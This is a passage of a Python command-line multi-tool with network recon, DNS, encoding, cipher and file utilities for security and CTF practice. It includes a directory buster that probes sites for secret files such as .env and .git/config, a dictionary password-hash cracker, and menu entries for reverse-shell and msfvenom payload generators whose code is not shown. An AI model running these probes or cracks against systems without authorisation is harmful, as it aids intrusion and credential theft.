    ctx["console"].print(f"Domain: {domain}")
    try:
        ips = sorted({i[4][0] for i in socket.getaddrinfo(domain, None)})
        ctx["console"].print(f"Resolved IPs: {', '.join(ips)}")
    except socket.gaierror as exc:
        ctx["console"].print(f"DNS lookup failed: {exc}")
    code, out, _ = _safe_run(["whois", domain], timeout=8)
    if code == 0:
        ctx["console"].print(out.split("source")[0][:1500])


# ============================================================
# Crypto
# ============================================================

def cmd_crypto_price(ctx):
    coins = ["bitcoin", "ethereum", "solana", "cardano", "dogecoin"]
    coin = ctx["choose"]("Coin", coins) or "bitcoin"
    vs = ctx["choose"]("Currency", ["usd", "eur", "inr", "gbp"]) or "usd"
    url = f"https://api.coingecko.com/api/v3/simple/price?ids={coin}&vs_currencies={vs}"
    try:
        with urllib.request.urlopen(url, timeout=10) as r:
            data = json.loads(r.read())
        price = data.get(coin, {}).get(vs)
        ctx["console"].print(f"[{ctx['theme'].primary}]{coin}[/]: {price} {vs.upper()}")
    except (urllib.error.URLError, json.JSONDecodeError) as exc:
        ctx["console"].print(f"[{ctx['theme'].danger}]Price fetch failed: {exc}[/]")


# ============================================================
# Hardware helpers (real detection + actionable next steps)
# ============================================================

def cmd_serial_monitor(ctx):
    if not shutil.which("pyserial"):
        ctx["console"].print("[yellow]pyserial not installed. Install with: pip install pyserial[/]")
    devices = []
    if os.path.isdir("/dev"):
        devices = sorted(p for p in os.listdir("/dev") if p.startswith("tty.") or p.startswith("cu."))
    if not devices:
        # Windows / generic fallback
        ctx["console"].print("No /dev/tty.* devices detected (Windows or no serial hardware).")
    else:
        rows = [(d, os.path.exists(os.path.join("/dev", d))) for d in devices]
        _print_table(ctx, rows, ("Device", "Exists"))


def cmd_iot_discovery(ctx):
    ctx["console"].print(f"[{ctx['theme'].primary}]Quick mDNS browse (avahi):[/]")
    code, out, err = _safe_run(["avahi-browse", "-art"], timeout=8)
    ctx["console"].print(out or err or "Install avahi-tools to use mDNS browsing.")


# ============================================================
# Default / fallback
# ============================================================

def cmd_about(ctx):
    ctx["console"].print(ctx["panel"](
        f"v{ctx.get('version', '1.0.0')} · {ctx.get('subcategory', '')} · {ctx.get('category', '')}",
        title="About this tool",
    ))


def cmd_system(ctx):
    import platform
    ctx["console"].print(ctx["panel"](
        f"OS: {platform.system()} {platform.release()}\n"
        f"Python: {platform.python_version()}\n"
        f"User: {os.environ.get('USER', os.environ.get('USERNAME', '?'))}\n"
        f"CWD: {os.getcwd()}\n"
        f"Time: {_dt.datetime.utcnow().isoformat()}Z",
        title="System information",
    ))


def cmd_help(ctx):
    ctx["console"].print(ctx["panel"](
        "Use the arrow keys to pick a command.\n"
        "Press Ctrl+C to return to the menu at any time.",
        title="Help",
    ))


# ============================================================
# Command registry
# ============================================================

def cmd_subnet_calc(ctx):
    """Compute network, broadcast, host range from a CIDR."""
    import ipaddress
    target = ctx["ask"]("CIDR (e.g. 192.168.1.0/24)", "192.168.1.0/24")
    try:
        net = ipaddress.ip_network(target, strict=False)
    except ValueError as exc:
        ctx["console"].print(f"[{ctx['theme'].danger}]Bad CIDR: {exc}[/]")
        return
    rows = [
        ("Network", str(net.network_address)),
        ("Broadcast", str(net.broadcast_address)),
        ("Netmask", str(net.netmask)),
        ("Hosts", str(net.num_addresses - 2 if net.prefixlen <= 30 else net.num_addresses)),
        ("First host", str(net.network_address + 1)),
        ("Last host", str(net.broadcast_address - 1)),
        ("Version", "IPv6" if net.version == 6 else "IPv4"),
    ]
    _print_table(ctx, rows, ("Field", "Value"))


def cmd_dir_buster(ctx):
    """HTTP directory buster against a small built-in wordlist."""
    base = ctx["ask"]("Base URL (https://site/)", "https://example.com/").rstrip("/")
    wordlist = ["admin", "login", "dashboard", "api", "config", "backup",
                ".env", "robots.txt", "sitemap.xml", "uploads", "static",
                "test", "old", "dev", "phpinfo.php", "wp-admin", ".git/config"]
    found = []
    ctx["console"].print(f"[{ctx['theme'].info}]Probing {len(wordlist)} paths ...[/]")
    for word in wordlist:
        url = f"{base}/{word}"
        try:
            req = urllib.request.Request(url, headers={"User-Agent": "{{PROJECT_NAME}}/1.0"})
            with urllib.request.urlopen(req, timeout=4) as r:
                found.append((word, r.status, r.geturl()))
        except urllib.error.HTTPError as exc:
            if exc.code in (401, 403):
                found.append((word, exc.code, "auth-protected"))
        except urllib.error.URLError:
            continue
    rows = found or [("none", 0, "")]
    _print_table(ctx, rows, ("Path", "Status", "Note"))


def cmd_hash_cracker(ctx):
    """Dictionary attack against a hash using a built-in wordlist."""
    algo = ctx["choose"]("Algorithm", sorted(hashlib.algorithms_guaranteed)) or "sha256"
    target = ctx["ask"]("Target hash (hex)").strip().lower()
    if not target:
        return
    wordlist = ["password", "123456", "admin", "root", "letmein", "qwerty",
                "welcome", "monkey", "dragon", "secret", "passw0rd",
                "iloveyou", "sunshine", "football", "12345678", "1234567890"]
    for word in wordlist:
        if hashlib.new(algo, word.encode()).hexdigest() == target:
            ctx["console"].print(f"[{ctx['theme'].success}]Cracked:[/] {word}")
            return
    ctx["console"].print(f"[{ctx['theme'].warning}]No match in built-in wordlist ({len(wordlist)} words).[/]")


def cmd_jwt_decode(ctx):
    """Decode a JWT's header and payload (no signature verification)."""
    token = ctx["ask"]("JWT").strip()
    if not token or token.count(".") < 2:
        ctx["console"].print(f"[{ctx['theme'].danger}]Not a JWT.[/]")
        return
    def _b64(seg):
        pad = "=" * (-len(seg) % 4)
        return base64.urlsafe_b64decode(seg + pad).decode("utf-8", "replace")
    header, payload, _sig = token.split(".")[0:3]
    rows = [
        ("Header", json.dumps(json.loads(_b64(header)), indent=2)),
        ("Payload", json.dumps(json.loads(_b64(payload)), indent=2)),
    ]
    _print_table(ctx, rows, ("Part", "Content"))


def cmd_ssl_scan(ctx):
    """Fetch a TLS certificate and show issuer/validity."""
    host = ctx["ask"]("Host", "example.com")
    try:
        port = int(ctx["ask"]("Port", "443"))
    except ValueError as exc:
        ctx["console"].print(f"[{ctx['theme'].danger}]Port must be a number: {exc}[/]")
        return
    import ssl
    ctx = _with_attr(ctx, "_ssl_ctx", ssl.create_default_context())
    try:
        with socket.create_connection((host, port), timeout=8) as sock:
            with ctx["_ssl_ctx"].wrap_socket(sock, server_hostname=host) as ssock:
                cert = ssock.getpeercert()
        subject = dict(x[0] for x in cert.get("subject", ()))
        issuer = dict(x[0] for x in cert.get("issuer", ()))
        rows = [
            ("Subject CN", subject.get("commonName", "")),
            ("Issuer", issuer.get("commonName", issuer.get("organizationName", ""))),
            ("Not before", cert.get("notBefore", "")),
            ("Not after", cert.get("notAfter", "")),
            ("Serial", cert.get("serialNumber", "")),
        ]
        _print_table(ctx, rows, ("Field", "Value"))
    except (ssl.SSLError, OSError) as exc:
        ctx["console"].print(f"[{ctx['theme'].danger}]TLS fetch failed: {exc}[/]")


def _with_attr(d, k, v):
    d[k] = v
    return d


def cmd_mac_vendor(ctx):
    """Look up the vendor for a MAC address via the macvendors.com API."""
    mac = ctx["ask"]("MAC (e.g. 00:1A:2B:3C:4D:5E)", "00:1A:2B:3C:4D:5E").strip()
    clean = re.sub(r"[^0-9a-fA-F]", "", mac)[:6].lower()
    if len(clean) < 6:
        ctx["console"].print(f"[{ctx['theme'].danger}]Need at least 6 hex digits (OUI).[/]")
        return
    try:
        with urllib.request.urlopen(f"https://api.macvendors.com/{clean}", timeout=6) as r:
            vendor = r.read().decode("utf-8", "replace")
        ctx["console"].print(f"[{ctx['theme'].primary}]{mac}[/] -> [{ctx['theme'].fg}]{vendor}[/]")
    except urllib.error.URLError as exc:
        ctx["console"].print(f"[{ctx['theme'].danger}]Lookup failed: {exc}[/]")


def cmd_arp_scan(ctx):
    """Parse the local ARP table."""
    code, out, err = _safe_run(["arp", "-a"], timeout=5)
    if code != 0:
        code, out, _ = _safe_run(["ip", "neigh"], timeout=5)
    if code != 0:
        ctx["console"].print(f"[{ctx['theme'].warning}]arp/ip unavailable on this OS.[/]")
        return
    rows = []
    for line in out.splitlines():
        parts = line.split()
        if len(parts) >= 2 and "." in parts[0]:
            rows.append((parts[1], parts[0]))
        elif len(parts) >= 5 and parts[1] == "dev":
            rows.append((parts[0], parts[2]))
    _print_table(ctx, rows[:50], ("MAC / IP", "Interface / Type"))


def cmd_wayback(ctx):
    """Query the Wayback Machine CDX API for archived snapshots."""
    url = ctx["ask"]("URL", "example.com")
    api = f"http://web.archive.org/cdx/search/cdx?url={urllib.parse.quote(url)}&limit=20&output=json"
    try:
        with urllib.request.urlopen(api, timeout=10) as r:
            data = json.loads(r.read())
    except (urllib.error.URLError, json.JSONDecodeError) as exc:
        ctx["console"].print(f"[{ctx['theme'].danger}]Wayback query failed: {exc}[/]")
        return
    if len(data) < 2:
        ctx["console"].print("[yellow]No snapshots found.[/]")
        return
    rows = [(row[1], row[2], row[4]) for row in data[1:]]
    _print_table(ctx, rows, ("Timestamp", "Original", "Status"))


def cmd_cert_transparency(ctx):
    """Search crt.sh certificate transparency logs for a domain."""
    domain = ctx["ask"]("Domain", "example.com")
    api = f"https://crt.sh/?q={urllib.parse.quote('%.' + domain)}&output=json"
    try:
        with urllib.request.urlopen(api, timeout=10) as r:
            data = json.loads(r.read())
    except (urllib.error.URLError, json.JSONDecodeError) as exc:
        ctx["console"].print(f"[{ctx['theme'].danger}]crt.sh query failed: {exc}[/]")
        return
    rows = []
    seen = set()
    for entry in data[:50]:
        name = entry.get("name_value", "").split("\n")[0]
        if name and name not in seen:
            seen.add(name)
            rows.append((entry.get("not_before", ""), name))
    _print_table(ctx, rows[:30], ("Issued", "Certificate name"))


def cmd_reverse_dns(ctx):
    """Reverse-resolve an IP."""
    ip = ctx["ask"]("IP", "8.8.8.8")
    try:
        host, _aliases, _ips = socket.gethostbyaddr(ip)
        ctx["console"].print(f"[{ctx['theme'].primary}]{ip}[/] -> [{ctx['theme'].fg}]{host}[/]")
    except socket.herror:
        ctx["console"].print(f"[{ctx['theme'].warning}]No PTR record.[/]")


def _dns_json(ctx, name, rtype="TXT"):
    """Resolve DNS records via the Google DNS over HTTPS JSON API (stdlib only)."""
    url = f"https://dns.google/resolve?name={urllib.parse.quote(name)}&type={rtype}"
    try:
        with urllib.request.urlopen(url, timeout=6) as r:
            return json.loads(r.read())
    except (urllib.error.URLError, json.JSONDecodeError) as exc:
        ctx["console"].print(f"[{ctx['theme'].danger}]DNS query failed: {exc}[/]")
        return None


def cmd_spf_dmarc(ctx):
    """Show SPF and DMARC records for a domain."""
    domain = ctx["ask"]("Domain", "example.com")
    for rtype, label in (("TXT", f"SPF/TXT for {domain}"), ("TXT", f"DMARC for {domain}")):
        name = f"_dmarc.{domain}" if "DMARC" in label else domain
        data = _dns_json(ctx, name, rtype)
        if not data:
            continue
        answers = [a for a in data.get("Answer", [])
                   if ("v=spf1" in a.get("data", "") if "SPF" in label
                       else "v=DMARC" in a.get("data", "").upper())]
        ctx["console"].print(f"[bold]{label}[/]")
        for a in answers or []:
            ctx["console"].print(f"  {a['data']}")
        if not answers:
            ctx["console"].print(f"  [yellow](none)[/]")


def cmd_email_validate(ctx):
    """Validate email syntax and check MX records exist."""
    email = ctx["ask"]("Email", "test@example.com").strip()
    if not re.match(r"^[^@\s]+@[^@\s]+\.[^@\s]+$", email):
        ctx["console"].print(f"[{ctx['theme'].danger}]Invalid syntax.[/]")
        return
    domain = email.split("@", 1)[1]
    data = _dns_json(ctx, domain, "MX")
    mx = [a["data"] for a in (data or {}).get("Answer", []) if a.get("type") == 15]
    rows = [
        ("Syntax", "valid"),
        ("Domain", domain),
        ("Mail servers", ", ".join(mx) or "none"),
    ]
    _print_table(ctx, rows, ("Check", "Result"))


def cmd_uuid_tool(ctx):
    op = ctx["choose"]("Operation", ["generate v4", "parse"]) or "generate v4"
    if op == "generate v4":
        ctx["console"].print(f"[{ctx['theme'].primary}]{uuid.uuid4()}[/]")
    else:
        u = ctx["ask"]("UUID", str(uuid.uuid4()))
        try:
            parsed = uuid.UUID(u)
            rows = [("Version", f"v{parsed.version}"), ("Variant", str(parsed.variant)),
                    ("Hex", parsed.hex), ("Int", str(parsed.int))]
            _print_table(ctx, rows, ("Field", "Value"))
        except ValueError as exc:
            ctx["console"].print(f"[{ctx['theme'].danger}]{exc}[/]")


def cmd_vin_check(ctx):
    """Validate a VIN using the real ISO 3779 checksum algorithm."""
    vin = ctx["ask"]("VIN (17 chars)", "1HGCM82633A123456").strip().upper()
    if len(vin) != 17:
        ctx["console"].print(f"[{ctx['theme'].danger}]VIN must be 17 chars.[/]")
        return
    translit = {c: i for i, c in enumerate("ABCDEFGHJKLMNPRSTUVWXYZ")}
    weights = [8, 7, 6, 5, 4, 3, 2, 10, 0, 9, 8, 7, 6, 5, 4, 3, 2]
    try:
        total = 0
        for i, ch in enumerate(vin):
            if ch.isdigit():
                val = int(ch)
            elif ch in translit:
                val = translit[ch]
            else:
                raise ValueError(f"Invalid char {ch}")
            total += val * weights[i]
        check = total % 11
        computed = "X" if check == 10 else str(check)
        valid = computed == vin[8]
        ctx["console"].print(f"[{ctx['theme'].success if valid else ctx['theme'].danger}]"
                              f"Check digit {vin[8]} (computed {computed}) - "
                              f"{'VALID' if valid else 'INVALID'}[/]")
    except ValueError as exc:
        ctx["console"].print(f"[{ctx['theme'].danger}]{exc}[/]")


_B58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def cmd_base58(ctx):
    op = ctx["choose"]("Operation", ["encode", "decode"]) or "encode"
    text = ctx["ask"]("Input")
    try:
        if op == "encode":
            n = int.from_bytes(text.encode("utf-8"), "big") or 0
            out = ""
            while n > 0:
                n, r = divmod(n, 58)
                out = _B58[r] + out
            for b in text.encode("utf-8"):
                if b == 0:
                    out = "1" + out
                else:
                    break
            ctx["console"].print(out)
        else:
            n = 0
            for ch in text:
                n = n * 58 + _B58.index(ch)
            ctx["console"].print(n.to_bytes((n.bit_length() + 7) // 8, "big").decode("utf-8", "replace"))
    except (ValueError, IndexError) as exc:
        ctx["console"].print(f"[{ctx['theme'].danger}]{exc}[/]")


def cmd_hmac_tool(ctx):
    algo = ctx["choose"]("Algorithm", sorted(hashlib.algorithms_guaranteed)) or "sha256"
    msg = ctx["ask"]("Message")
    key = getpass.getpass("Key: ")
    mac = hmac.new(key.encode("utf-8"), msg.encode("utf-8"), algo).hexdigest()
    ctx["console"].print(f"[{ctx['theme'].primary}]{algo}[/]: {mac}")


def cmd_cron_builder(ctx):
    """Build a cron expression field-by-field and describe it."""
    fields = {}
    for field, default in (("minute", "*"), ("hour", "*"), ("day-of-month", "*"),
                            ("month", "*"), ("day-of-week", "*")):
        fields[field] = ctx["ask"](field, default) or "*"
    expr = " ".join(fields[field] for field in
                    ("minute", "hour", "day-of-month", "month", "day-of-week"))
    ctx["console"].print(f"[bold]Cron:[/] {expr}")
    hint = []
    if fields["minute"] != "*" and fields["hour"] != "*":
        hint.append(f"At {fields['hour']}:{fields['minute'].zfill(2)}")
    ctx["console"].print(f"[dim]{'; '.join(hint) or 'See crontab.guru for full meaning'}[/]")


def cmd_json_pretty(ctx):
    raw = ctx["ask"]("JSON (or path to file)")
    if os.path.isfile(raw):
        raw = open(raw, encoding="utf-8").read()
    try:
        data = json.loads(raw)
    except json.JSONDecodeError as exc:
        ctx["console"].print(f"[{ctx['theme'].danger}]Invalid JSON: {exc}[/]")
        return
    op = ctx["choose"]("Output", ["pretty", "minify", "keys"]) or "pretty"
    if op == "pretty":
        ctx["console"].print_json(json.dumps(data, indent=2))
    elif op == "minify":
        ctx["console"].print(json.dumps(data, separators=(",", ":")))
    else:
        for k in data.keys() if isinstance(data, dict) else []:
            ctx["console"].print(f"  {k}")


def cmd_toml_view(ctx):
    """Parse a TOML file (Python 3.11+ tomllib)."""
    path = ctx["ask"]("TOML file path", "pyproject.toml")
    if not os.path.isfile(path):
        ctx["console"].print(f"[{ctx['theme'].danger}]Not found.[/]")
        return
    try:
        import tomllib
        with open(path, "rb") as fh:
            data = tomllib.load(fh)
        ctx["console"].print_json(json.dumps(data, indent=2, default=str))
    except ImportError:
        ctx["console"].print(f"[{ctx['theme'].warning}]tomllib needs Python 3.11+.[/]")
    except Exception as exc:
        ctx["console"].print(f"[{ctx['theme'].danger}]{exc}[/]")


def cmd_mime_sniff(ctx):
    """Sniff a file's type from its magic bytes (stdlib mimetypes + heuristics)."""
    path = ctx["ask"]("File path")
    if not os.path.isfile(path):
        ctx["console"].print(f"[{ctx['theme'].danger}]Not found.[/]")
        return
    import mimetypes
    head = open(path, "rb").read(16)
    rows = [("Path", path), ("Size", _human_read(len(open(path,'rb').read()))),
            ("Guess", mimetypes.guess_type(path)[0] or "unknown"),
            ("First bytes", head.hex())]
    _print_table(ctx, rows, ("Field", "Value"))


def _human_read(n):
    for u in ("B", "KB", "MB", "GB"):
        if abs(n) < 1024:
            return f"{n:.1f} {u}"
        n /= 1024
    return f"{n:.1f} TB"


def cmd_url_unshorten(ctx):
    """Follow redirects and show the final URL."""
    url = ctx["ask"]("Short URL", "https://bit.ly/example")
    try:
        req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
        with urllib.request.urlopen(req, timeout=8) as r:
            ctx["console"].print(f"[bold]Final:[/] {r.geturl()}")
            ctx["console"].print(f"[dim]Status: {r.status}[/]")
    except urllib.error.URLError as exc:
        ctx["console"].print(f"[{ctx['theme'].danger}]{exc}[/]")


def cmd_ip_geolocation(ctx):
    """Geolocate an IP via ip-api.com (free, no key)."""
    ip = ctx["ask"]("IP (blank for your own)", "")
    url = f"http://ip-api.com/json/{ip}?fields=status,country,regionName,city,isp,query,lon,lat"
    try:
        with urllib.request.urlopen(url, timeout=6) as r:
            data = json.loads(r.read())
        if data.get("status") != "success":
            ctx["console"].print(f"[{ctx['theme'].warning}]{data.get('status')}[/]")
            return
        rows = [(k, v) for k, v in data.items()]
        _print_table(ctx, rows, ("Field", "Value"))
    except (urllib.error.URLError, json.JSONDecodeError) as exc:
        ctx["console"].print(f"[{ctx['theme'].danger}]{exc}[/]")


def cmd_headers_dump(ctx):
    url = ctx["ask"]("URL", "https://example.com")
    try:
        with urllib.request.urlopen(url, timeout=8) as r:
            rows = [(k, v) for k, v in r.headers.items()]
            _print_table(ctx, rows, ("Header", "Value"))
    except urllib.error.URLError as exc:
        ctx["console"].print(f"[{ctx['theme'].danger}]{exc}[/]")


def cmd_http_methods(ctx):
    """Probe allowed HTTP methods via OPTIONS."""
    url = ctx["ask"]("URL", "https://example.com")
    try:
        req = urllib.request.Request(url, method="OPTIONS",
                                       headers={"User-Agent": "{{PROJECT_NAME}}/1.0"})
        with urllib.request.urlopen(req, timeout=6) as r:
            allow = r.headers.get("Allow", "(not advertised)")
            ctx["console"].print(f"[bold]Allow:[/] {allow}")
    except urllib.error.URLError as exc:
        ctx["console"].print(f"[{ctx['theme'].warning}]OPTIONS not supported: {exc}[/]")


def cmd_robots_parser(ctx):
    """Fetch and parse robots.txt, list sitemaps."""
    url = ctx["ask"]("Site", "https://example.com").rstrip("/") + "/robots.txt"
    try:
        with urllib.request.urlopen(url, timeout=6) as r:
            body = r.read().decode("utf-8", "replace")
    except urllib.error.URLError as exc:
        ctx["console"].print(f"[{ctx['theme'].danger}]{exc}[/]")
        return
    sitemaps = [l.split(":", 1)[1].strip() for l in body.splitlines() if l.lower().startswith("sitemap")]
    agents = [l.split(":", 1)[1].strip() for l in body.splitlines() if l.lower().startswith("user-agent")]
    rows = [("Sitemaps", ", ".join(sitemaps) or "none"),
            ("User-agents", ", ".join(agents) or "none")]
    _print_table(ctx, rows, ("Field", "Value"))


def cmd_sitemap_parser(ctx):
    url = ctx["ask"]("Sitemap URL", "https://example.com/sitemap.xml")
    try:
        with urllib.request.urlopen(url, timeout=8) as r:
            body = r.read().decode("utf-8", "replace")
    except urllib.error.URLError as exc:
        ctx["console"].print(f"[{ctx['theme'].danger}]{exc}[/]")
        return
    urls = re.findall(r"<loc>(.*?)</loc>", body)
    for u in urls[:50]:
        ctx["console"].print(f"  - {u}")
    ctx["console"].print(f"[dim]{len(urls)} URLs found.[/]")


def cmd_github_user(ctx):
    user = ctx["ask"]("GitHub username", "torvalds")
    try:
        with urllib.request.urlopen(f"https://api.github.com/users/{urllib.parse.quote(user)}", timeout=6) as r:
            data = json.loads(r.read())
        rows = [(k, data[k]) for k in ("login", "name", "company", "location",
                                          "public_repos", "followers", "following", "bio") if k in data]
        _print_table(ctx, rows, ("Field", "Value"))
    except urllib.error.URLError as exc:
        ctx["console"].print(f"[{ctx['theme'].danger}]{exc}[/]")


def cmd_github_repos(ctx):
    user = ctx["ask"]("GitHub username", "torvalds")
    try:
        with urllib.request.urlopen(f"https://api.github.com/users/{urllib.parse.quote(user)}/repos?per_page=20", timeout=6) as r:
            data = json.loads(r.read())
        rows = [(repo["name"], repo.get("language", ""), repo["stargazers_count"]) for repo in data]
        _print_table(ctx, rows, ("Repo", "Lang", "Stars"))
    except urllib.error.URLError as exc:
        ctx["console"].print(f"[{ctx['theme'].danger}]{exc}[/]")


def cmd_random_token(ctx):
    n = int(ctx["ask"]("Bytes", "32"))
    ctx["console"].print(f"[{ctx['theme'].primary}]{secrets.token_urlsafe(n)}[/]")


def cmd_timestamp_conv(ctx):
    val = ctx["ask"]("Unix timestamp or ISO datetime")
    try:
        if val.isdigit():
            ts = int(val)
            dt = _dt.datetime.fromtimestamp(ts, tz=_dt.timezone.utc)
            ctx["console"].print(f"[bold]UTC:[/] {dt.isoformat()}")
            ctx["console"].print(f"[bold]Local:[/] {_dt.datetime.fromtimestamp(ts).isoformat()}")
        else:
            dt = _dt.datetime.fromisoformat(val)
            ctx["console"].print(f"[bold]Unix:[/] {int(dt.timestamp())}")
    except (ValueError, OSError) as exc:
        ctx["console"].print(f"[{ctx['theme'].danger}]{exc}[/]")


def cmd_color_palette(ctx):
    """Generate a simple analogous palette from a base hex."""
    import colorsys
    h = ctx["ask"]("Base hex (#RRGGBB)", "#00fff5")
    try:
        r, g, b = int(h[1:3], 16) / 255, int(h[3:5], 16) / 255, int(h[5:7], 16) / 255
    except ValueError:
        ctx["console"].print(f"[{ctx['theme'].danger}]Bad hex.[/]")
        return
    H, S, V = colorsys.rgb_to_hsv(r, g, b)
    palette = []
    for offset in (-40, -20, 0, 20, 40):
        nh = (H + offset / 360) % 1.0
        pr, pg, pb = colorsys.hsv_to_rgb(nh, S, V)
        palette.append(f"#{int(pr*255):02x}{int(pg*255):02x}{int(pb*255):02x}")
    for c in palette:
        ctx["console"].print(f"[{c}]■■■[/]  {c}")


def cmd_rot_all(ctx):
    """Try all 25 Caesar shifts of a string."""
    text = ctx["ask"]("Ciphertext")
    for shift in range(1, 26):
        out = "".join(
            chr((ord(c) - 65 + shift) % 26 + 65) if "A" <= c <= "Z" else
            chr((ord(c) - 97 + shift) % 26 + 97) if "a" <= c <= "z" else c
            for c in text)
        ctx["console"].print(f"[dim]{shift:>2}[/] {out}")


def cmd_vigenere(ctx):
    op = ctx["choose"]("Operation", ["encrypt", "decrypt"]) or "encrypt"
    text = ctx["ask"]("Text")
    key = ctx["ask"]("Key", "secret")
    if not text or not key:
        return
    sign = 1 if op == "encrypt" else -1
    out = []
    ki = 0
    for ch in text:
        if ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            k = ord(key[ki % len(key)].lower()) - ord("a")
            out.append(chr((ord(ch) - base + sign * k) % 26 + base))
            ki += 1
        else:
            out.append(ch)
    ctx["console"].print("".join(out))


_MORSE = {
    "A": ".-", "B": "-...", "C": "-.-.", "D": "-..", "E": ".", "F": "..-.",
    "G": "--.", "H": "....", "I": "..", "J": ".---", "K": "-.-", "L": ".-..",
    "M": "--", "N": "-.", "O": "---", "P": ".--.", "Q": "--.-", "R": ".-.",
    "S": "...", "T": "-", "U": "..-", "V": "...-", "W": ".--", "X": "-..-",
    "Y": "-.--", "Z": "--..", "0": "-----", "1": ".----", "2": "..---",
    "3": "...--", "4": "....-", "5": ".....", "6": "-....", "7": "--...",
    "8": "---..", "9": "----.",
}
_MORSE_REV = {v: k for k, v in _MORSE.items()}


def cmd_morse(ctx):
    op = ctx["choose"]("Operation", ["encode", "decode"]) or "encode"
    text = ctx["ask"]("Input")
    if op == "encode":
        out = " ".join(_MORSE.get(ch.upper(), "") for ch in text if ch != " ")
        ctx["console"].print(out or "(nothing encodable)")
    else:
        words = text.split(" / ") if " / " in text else text.split("   ")
        out = []
        for word in words:
            out.append("".join(_MORSE_REV.get(tok, "?") for tok in word.split()))
        ctx["console"].print(" ".join(out))


def cmd_hexdump(ctx):
    path = ctx["ask"]("File path")
    if not os.path.isfile(path):
        ctx["console"].print(f"[{ctx['theme'].danger}]Not found.[/]")
        return
    data = open(path, "rb").read(1024)
    for i in range(0, len(data), 16):
        chunk = data[i:i+16]
        hexpart = " ".join(f"{b:02x}" for b in chunk)
        asciipart = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        ctx["console"].print(f"{i:08x}  {hexpart:<48}  {asciipart}")


def cmd_file_hash(ctx):
    path = ctx["ask"]("File path")
    if not os.path.isfile(path):
        ctx["console"].print(f"[{ctx['theme'].danger}]Not found.[/]")
        return
    algo = ctx["choose"]("Algorithm", sorted(hashlib.algorithms_guaranteed)) or "sha256"
    h = hashlib.new(algo)
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    ctx["console"].print(f"[bold]{algo}[/]: {h.hexdigest()}")


def cmd_zip_inspect(ctx):
    path = ctx["ask"]("Zip path")
    if not os.path.isfile(path):
        ctx["console"].print(f"[{ctx['theme'].danger}]Not found.[/]")
        return
    try:
        with zipfile.ZipFile(path) as zf:
            rows = [(info.filename, info.file_size, info.compress_size)
                    for info in zf.infolist()[:50]]
            _print_table(ctx, rows, ("Name", "Size", "Compressed"))
    except (zipfile.BadZipFile, OSError) as exc:
        ctx["console"].print(f"[{ctx['theme'].danger}]{exc}[/]")


def cmd_diff_text(ctx):
    import difflib
    a = ctx["ask"]("First text")
    b = ctx["ask"]("Second text")
    for line in difflib.unified_diff(a.splitlines(), b.splitlines(),
                                       lineterm="", n=1):
        if line.startswith("+"):
            ctx["console"].print(f"[{ctx['theme'].success}]{line}[/]")
        elif line.startswith("-"):
            ctx["console"].print(f"[{ctx['theme'].danger}]{line}[/]")
        else:
            ctx["console"].print(line)


def cmd_word_count(ctx):
    text = ctx["ask"]("Text (or path)")
    if os.path.isfile(text):
        text = open(text, encoding="utf-8").read()
    rows = [("Lines", text.count(chr(10)) + 1), ("Words", len(text.split())),
            ("Chars", len(text)), ("Bytes", len(text.encode("utf-8")))]
    _print_table(ctx, rows, ("Metric", "Count"))


def cmd_base_convert(ctx):
    n = ctx["ask"]("Number")
    frm = int(ctx["ask"]("From base", "10"))
    to = int(ctx["ask"]("To base", "16"))
    try:
        value = int(n, frm) if isinstance(n, str) else int(n)
        ctx["console"].print(f"[bold]base{to}:[/] {selfless_digits(value, to)}")
    except (ValueError, TypeError) as exc:
        ctx["console"].print(f"[{ctx['theme'].danger}]{exc}[/]")


def selfless_digits(n, base):
    if n == 0:
        return "0"
    digits = "0123456789abcdefghijklmnopqrstuvwxyz"
    out = ""
    while n > 0:
        n, r = divmod(n, base)
        out = digits[r] + out
    return out


# ============================================================
# Command registry (real, grouped)
# ============================================================

COMMANDS: Dict[str, Dict[str, List[Tuple[str, Callable]]]] = {
    "Cybersecurity": {
        "Port Scanner": [
            ("TCP connect scan", cmd_port_scan),
            ("Subnet calculator", cmd_subnet_calc),
            ("SSL/TLS cert scan", cmd_ssl_scan),
            ("ARP scan (local)", cmd_arp_scan),
            ("HTTP methods probe", cmd_http_methods),
            ("Headers dump", cmd_headers_dump),
        ],
        "DNS": [
            ("Lookup A/AAAA", cmd_dns_lookup),
            ("Reverse DNS", cmd_reverse_dns),
            ("SPF / DMARC", cmd_spf_dmarc),
        ],
        "WHOIS": [("Lookup", cmd_whois)],
        "Hash Tool": [
            ("Compute hash", cmd_hash),
            ("Dictionary cracker", cmd_hash_cracker),
            ("Hash a file", cmd_file_hash),
            ("HMAC", cmd_hmac_tool),
        ],
        "Encryption": [("Symmetric encrypt/decrypt", cmd_encrypt)],
        "Encoding": [
            ("Encoder/Decoder", cmd_encode),
            ("Base58", cmd_base58),
        ],
        "Reverse Shell Helper": [("One-liner generator", cmd_reverse_shell_helper)],
        "Payload Generator": [("msfvenom template", cmd_payload_gen)],
        "Web Scanner": [
            ("HTTP header check", cmd_web_scan),
            ("Directory buster", cmd_dir_buster),
            ("JWT decode", cmd_jwt_decode),
            ("robots.txt parser", cmd_robots_parser),
            ("Sitemap parser", cmd_sitemap_parser),
            ("URL unshortener", cmd_url_unshorten),
        ],
        "Recon": [
            ("Domain recon", cmd_recon),
            ("Wayback Machine lookup", cmd_wayback),
            ("Certificate Transparency (crt.sh)", cmd_cert_transparency),
            ("GitHub user", cmd_github_user),
        ],
        "Network Monitor": [
            ("/proc/net/dev sampler", cmd_network_monitor),
            ("Headers dump", cmd_headers_dump),
        ],
        "Log Analyzer": [("Count by level", cmd_log_analyzer)],
        "CTF Tool": [
            ("Encoder toolbox", cmd_ctf_helper),
            ("All Caesar shifts (ROT)", cmd_rot_all),
            ("Vigenere cipher", cmd_vigenere),
            ("Morse code", cmd_morse),
            ("JSON pretty / minify", cmd_json_pretty),
            ("Hexdump", cmd_hexdump),
            ("Diff two strings", cmd_diff_text),
        ],
        "Custom": [
            ("OSINT username search", cmd_osint),
            ("WiFi scan", cmd_wifi_scan),
            ("Bluetooth scan", cmd_bluetooth_scan),
            ("Packet analyzer", cmd_packet_analyzer),
            ("MAC vendor lookup", cmd_mac_vendor),
        ],
    },
    "Networking": {
        "Port Scanner": [
            ("TCP connect scan", cmd_port_scan),
            ("Subnet calculator", cmd_subnet_calc),
